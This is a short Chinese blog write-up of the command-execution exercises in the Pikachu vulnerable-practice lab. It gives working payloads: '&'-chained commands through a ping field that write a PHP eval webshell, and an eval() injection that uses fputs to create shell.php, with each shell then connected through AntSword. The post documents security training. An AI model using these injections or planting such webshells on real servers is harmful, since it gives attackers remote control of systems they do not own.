Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
国科安芯14 小时前
RISC-V 异常中断机制全解析
运维·单片机·嵌入式硬件·安全·risc-v·安全性测试
鸠摩智首席音效师15 小时前
如何在 Linux 下以 www-data 用户运行 Crontab ?
linux·运维·服务器
不染尘.15 小时前
应用层之WWW
服务器·javascript·css·网络·网络协议·计算机网络·html
DX_水位流量监测15 小时前
压力式水位计的技术特性与应用实践
大数据·网络·人工智能·安全·信息可视化
全栈工程师修炼指南15 小时前
Nginx | HTTP 反向代理:对上游服务端响应缓存流程浅析与配置实践
运维·网络协议·nginx·http·缓存
江西省遂川县常驻深圳大使15 小时前
一个免费的APK加固和APK安全检测平台
安全·免费·android安全·apk加固·apk安全检测
iCxhust15 小时前
linux /etc 目录 etc是什么缩写
linux·运维·服务器·php
QT 小鲜肉15 小时前
【Linux命令大全】001.文件管理之mc命令(实操篇)
linux·运维·服务器·前端·笔记
测试人社区-千羽15 小时前
智能化测试:AI驱动的测试覆盖率提升方法论与实战路径
运维·人工智能·测试工具·程序人生·自动化·测试覆盖率
loong_XL16 小时前
elastic kibana可视化数据统计案例
运维·ai·智能体
热门推荐
01GitHub 镜像站点02从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击03电脑检测软件—图吧工具箱04Linux下V2Ray安装配置指南05Web安全中SQL注入绕过WAF的具体手法和实战案例063D 圣诞树网页代码07UV安装并设置国内源08jdk21下载、安装(Windows、Linux、macOS)09SQLmap 完整使用指南:环境搭建 + 命令详解 + 实操案例10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)